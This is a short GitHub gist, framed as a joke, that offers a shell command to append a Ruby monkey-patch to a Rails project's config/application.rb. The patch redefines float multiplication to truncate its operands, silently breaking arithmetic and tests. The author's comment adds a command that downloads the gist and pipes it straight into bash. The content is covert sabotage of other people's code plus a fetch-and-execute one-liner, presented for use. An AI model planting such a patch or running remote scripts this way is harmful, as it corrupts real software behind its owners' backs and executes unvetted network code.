Skip to content

Instantly share code, notes, and snippets.

@tjh
Created May 2, 2012 20:55
Show Gist options
  • Save tjh/2580411 to your computer and use it in GitHub Desktop.
Save tjh/2580411 to your computer and use it in GitHub Desktop.
HUMOR: Have some fun with the Rails devs in your life, wreck Float#* and watch tests explode.
echo 'class Float; def *(other); self.to_i * other.to_i; end; end;' >> config/application.rb
@tjh
Copy link
Author

tjh commented May 2, 2012

curl https://raw.github.com/gist/2580411 | bash

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment